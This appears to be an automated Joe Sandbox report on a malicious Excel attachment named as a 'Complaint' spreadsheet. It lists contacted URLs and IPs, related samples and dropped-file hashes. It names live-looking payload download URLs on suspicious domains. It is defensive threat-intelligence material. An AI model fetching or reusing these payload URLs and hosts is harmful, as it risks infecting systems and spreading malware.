                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                      high
                                                                                      https://management.azure.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                        high
                                                                                        http://suspend.pars.host/image/logo.pngsuspendedpage[1].htm.0.drfalse
                                                                                          high
                                                                                          https://incidents.diagnostics.office.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/iosC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmediaC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.netC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                high
                                                                                                                https://storage.live.com/clientlogs/uploadlocationC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                  high
                                                                                                                  https://templatelogging.office.com/client/logC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                          high
                                                                                                                          http://pars.hostsuspendedpage[1].htm.0.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus-000.contentsync.C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://login.windows.net/common/oauth2/authorizeC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/importsC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v2C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/macC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.o365filtering.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.cortana.aiC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://onedrive.live.comC35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    185.159.153.72
                                                                                                                                                    unknownIran (ISLAMIC Republic Of)
                                                                                                                                                    201999SERVERPARSIRfalse
                                                                                                                                                    181.88.192.136
                                                                                                                                                    unknownArgentina
                                                                                                                                                    7303TelecomArgentinaSAARfalse
                                                                                                                                                    112.125.131.128
                                                                                                                                                    unknownChina
                                                                                                                                                    37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                    Analysis ID:356327
                                                                                                                                                    Start date:22.02.2021
                                                                                                                                                    Start time:22:58:05
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 47s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:light
                                                                                                                                                    Sample file name:Complaint-1091191320-02182021.xls
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:34
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal88.expl.evad.winXLS@11/8@3/3
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 51.104.139.180, 104.42.151.234, 204.79.197.200, 13.107.21.200, 93.184.220.29, 23.211.6.115, 52.255.188.83, 52.109.32.63, 52.109.8.24, 52.109.8.25, 52.109.88.38, 13.64.90.137, 13.88.21.125, 23.218.208.56, 51.104.144.132, 8.253.95.120, 67.27.157.126, 8.248.133.254, 8.248.119.254, 8.253.95.121, 8.253.207.120, 8.253.95.249, 67.27.157.254, 8.248.131.254, 8.248.117.254, 20.54.26.129, 92.122.213.194, 92.122.213.247, 51.132.208.181, 52.155.217.156
                                                                                                                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    185.159.153.72Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 7ruzezendegi.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                    Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 7ruzezendegi.com/samsgtlfwzt/44246552209027800000.dat
                                                                                                                                                    Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 7ruzezendegi.com/samsgtlfwzt/44246549891435200000.dat
                                                                                                                                                    Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 7ruzezendegi.com/samsgtlfwzt/44246547662963000000.dat
                                                                                                                                                    Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 7ruzezendegi.com/samsgtlfwzt/44246544175463000000.dat
                                                                                                                                                    181.88.192.136Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • dindorf.com.ar/ntpnttfypqs/44249951829861100000.dat
                                                                                                                                                    Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • dindorf.com.ar/ntpnttfypqs/44246552209027800000.dat
                                                                                                                                                    Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • dindorf.com.ar/ntpnttfypqs/44246549891435200000.dat
                                                                                                                                                    Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • dindorf.com.ar/ntpnttfypqs/44246547662963000000.dat
                                                                                                                                                    Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • dindorf.com.ar/ntpnttfypqs/44246544175463000000.dat
                                                                                                                                                    112.125.131.128Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                      Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                        Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                          Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                            Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              dindorf.com.arComplaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 181.88.192.136
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 181.88.192.136
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 181.88.192.136
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 181.88.192.136
                                                                                                                                                              miaovideo.comComplaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 112.125.131.128
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 112.125.131.128
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 112.125.131.128
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 112.125.131.128
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 112.125.131.128
                                                                                                                                                              7ruzezendegi.comComplaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.72
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.72
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.72
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.72
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.72

                                                                                                                                                              ASN

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdComplaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 112.125.131.128
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 112.125.131.128
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 112.125.131.128
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 112.125.131.128
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 112.125.131.128
                                                                                                                                                              vodafone bill.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 106.15.177.228
                                                                                                                                                              12592516.exeGet hashmaliciousBrowse
                                                                                                                                                              • 60.205.177.239
                                                                                                                                                              Vodafone Bill.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 106.15.177.228
                                                                                                                                                              Vodafone Bill.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 106.15.177.228
                                                                                                                                                              vodafone bill.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 106.15.177.228
                                                                                                                                                              Vodafone Bill.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 106.15.177.228
                                                                                                                                                              vodafone bill.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 106.15.177.228
                                                                                                                                                              vodafone bill.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 106.15.177.228
                                                                                                                                                              DocuSign_1836114226_1054348953.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 8.170.20.72
                                                                                                                                                              Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                              • 39.106.80.157
                                                                                                                                                              DocuSign_522706162_899818361.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 8.170.20.72
                                                                                                                                                              DocuSign_77779925_593019506.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 8.170.20.72
                                                                                                                                                              Vodafone bill.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 106.15.177.228
                                                                                                                                                              Vodafone bill.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 106.15.177.228
                                                                                                                                                              Vodafone bill.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 106.15.177.228
                                                                                                                                                              SERVERPARSIRComplaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.72
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.72
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.72
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.72
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.72
                                                                                                                                                              RFQ ID 574853.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.117
                                                                                                                                                              Order484894.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.117
                                                                                                                                                              Payment copy details.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 185.55.225.19
                                                                                                                                                              Payment copy details.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 185.55.225.19
                                                                                                                                                              New Iquiry.xlsmGet hashmaliciousBrowse
                                                                                                                                                              • 185.55.225.19
                                                                                                                                                              SecuriteInfo.com.Generic.mg.d4f8d10203aece68.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.55.225.19
                                                                                                                                                              TJLhqM8b2O.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.55.225.19
                                                                                                                                                              https://eya.ir/.dhl2020/dhl/source/index.php?email=sav@idcom-frGet hashmaliciousBrowse
                                                                                                                                                              • 185.55.227.78
                                                                                                                                                              DOC_18_092020_4_41133.docGet hashmaliciousBrowse
                                                                                                                                                              • 185.55.225.33
                                                                                                                                                              Ucpovt5Tm3FncOG.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.69
                                                                                                                                                              rKdhHVWehasFrcb.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.69
                                                                                                                                                              4PGVV5ztI9OHQsS.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.69
                                                                                                                                                              8JVksjPpTQe3cej.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.69
                                                                                                                                                              PLoLHKhSjefximh.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.69
                                                                                                                                                              LmmDm1gMY4XV2Ti.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.159.153.69
                                                                                                                                                              TelecomArgentinaSAARComplaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 181.88.192.136
                                                                                                                                                              SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 186.137.85.76
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 181.88.192.136
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 181.88.192.136
                                                                                                                                                              Complaint-1432955583-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 181.88.192.136
                                                                                                                                                              Complaint-1826988139-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 181.88.192.136
                                                                                                                                                              SecuriteInfo.com.Heur.28366.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 186.137.85.76
                                                                                                                                                              Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                                                                                                                                                              • 186.137.85.76
                                                                                                                                                              IU-8549 Medical report COVID-19.docGet hashmaliciousBrowse
                                                                                                                                                              • 181.171.209.241
                                                                                                                                                              carirstlite.exeGet hashmaliciousBrowse
                                                                                                                                                              • 200.127.121.99
                                                                                                                                                              Io8ic2291n.docGet hashmaliciousBrowse
                                                                                                                                                              • 152.169.22.67
                                                                                                                                                              wEcncyxrEeGet hashmaliciousBrowse
                                                                                                                                                              • 181.95.96.141
                                                                                                                                                              INFO_2020.docGet hashmaliciousBrowse
                                                                                                                                                              • 190.247.139.101
                                                                                                                                                              WUHU95Apq3Get hashmaliciousBrowse
                                                                                                                                                              • 181.92.104.178
                                                                                                                                                              creoagent.dllGet hashmaliciousBrowse
                                                                                                                                                              • 201.212.10.205
                                                                                                                                                              creoagent.dllGet hashmaliciousBrowse
                                                                                                                                                              • 201.212.10.205
                                                                                                                                                              file.docGet hashmaliciousBrowse
                                                                                                                                                              • 181.10.46.92
                                                                                                                                                              453690-3012-QZS-9120501.docGet hashmaliciousBrowse
                                                                                                                                                              • 190.247.139.101
                                                                                                                                                              file-2021-7_86628.docGet hashmaliciousBrowse
                                                                                                                                                              • 181.10.46.92
                                                                                                                                                              Messaggio 2001 2021 3-4543.docGet hashmaliciousBrowse
                                                                                                                                                              • 181.10.46.92

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\C35819AA-F89D-426C-9CA4-8F8A37A7597D
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):132891
                                                                                                                                                              Entropy (8bit):5.3758859937405195
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:EcQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:+cQ9DQW+z0XiK
                                                                                                                                                              MD5:0AB730FD435EA46EB7576D082C2E302C
                                                                                                                                                              SHA1:D875163FDE2D51213C5828719E4AF80B50CC7071
                                                                                                                                                              SHA-256:EAC3AA950465565B206F4039DF3BB67129D1B3D8DBC377C86E02B4EFF429E5C8
                                                                                                                                                              SHA-512:3D9AC0A444C878BBF5128ECC589ADD50E72516ED1C39A9270BC53E1881A24B8DBDCB5DBDAC6AED3B6344A6460686A9290FFF94685ECF58C5FD7BE75590CBEF9E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-22T21:58:59">.. Build: 16.0.13817.30529-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\suspendedpage[1].htm
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):678
                                                                                                                                                              Entropy (8bit):5.285274611226955
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:qTWgr2dzLtGc8NZAPvzLUIp1Y2vWMA78h2vu9ZQhUytSAzYNPvK6wcYKpGu:0Wxdz8LkHzA2Y2vW+h2vunQr1CK6Tz
                                                                                                                                                              MD5:1C7833DA48979334A611F80C7C55F5E6
                                                                                                                                                              SHA1:B302B4245452489C6241CE4358BD1F07BA4A6767
                                                                                                                                                              SHA-256:D0D92045526C516AFEC269826EB681EF55DF6353DD9D131BC58A1B19042B7C6C
                                                                                                                                                              SHA-512:512D0ED4A7BD2BA867C96AF87F114B343FD821A3C826B7F04272AFE40CE218294E893D49167932248DD9297A423B2DC354F07659F979416433DB7F62AF6B0C5C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              IE Cache URL:http://7ruzezendegi.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                              Preview: <!doctype html>..<html>..<head>..<meta charset="utf-8">..<title>Suspend !</title>..<link href="http://suspend.pars.host/css/css.css" rel="stylesheet" type="text/css">..</head>....<body>..<div class="main">..<center><a style="" href="http://pars.host"><img src="http://suspend.pars.host/image/logo.png" /></a></center>..<p align="center">..... ..... .. ...... ..... ... ...<br>........ .... ...... ... ..... ..... . .... .... ... .......<br>....... .. .... <a style="" href="http://pars.host">.... ....</a> .... .... .........<br><br>..</div>....</p>..</body>..</html>..
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\83910000
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):31745
                                                                                                                                                              Entropy (8bit):7.6429719674476795
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:A2EQtJP8GSpojQGnfViKzV8aoVT0QNuzWKPqSFAW36e4v674AJP5ud3KdrHDjNHp:kWMGfViKiW+u7qSqW3wvJSP5ukdrDReQ
                                                                                                                                                              MD5:369659BCDB299454F358B01CCF23206F
                                                                                                                                                              SHA1:E565E69D9257B29A6DDA833928FC98A559E2C3DC
                                                                                                                                                              SHA-256:93542189F45AF5704A1A7C00D20269735AC1E99492519DAB7C9EC5E497D6B20F
                                                                                                                                                              SHA-512:99286D0C300D2AE562821B519D6D3D9D192EEAA653AF8771012400144D3ABCBAF7BC94CB494ED82C9360C1345E5D2B1E3B7481CDAD0384953BCB6E385CBD0C0A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: .U.N.0...?D......5e1.r....\.6..|....[.C.m.l.s..8.._-... ...eg.U.W.u-..p[_...pJ..eK@v59.1~X.....[..~q...+......|.".k.x.r.:...O..K.R.2....a&.M.n.4.r.\...T...<."..}B...."Qi..O.j?.i...GKf...... Y...c...(..B3..a....B.c......y.c..Z....F....1.......}.O..7.Ir4.kXH0M...BF........^..P*H..vv...d.j.J......P#....Ce.D|.L....\.........~..H.)."..O..o7.{....s......&..{...{..............9.a..k...:...a.D...."5.+.|J)P[.y9.'/.......PK..........!.......V.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint-1091191320-02182021.xls.LNK
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:44 2020, mtime=Tue Feb 23 05:59:01 2021, atime=Tue Feb 23 05:59:01 2021, length=61952, window=hide
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2300
                                                                                                                                                              Entropy (8bit):4.641587526221672
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:82ljggzSDqJyA3SwqnD497aB6my2ljggzSDqJyA3SwqnD497aB6m:809G6R3lTQB6p09G6R3lTQB6
                                                                                                                                                              MD5:E7699CE896065A242ACF6C63CFDE6D48
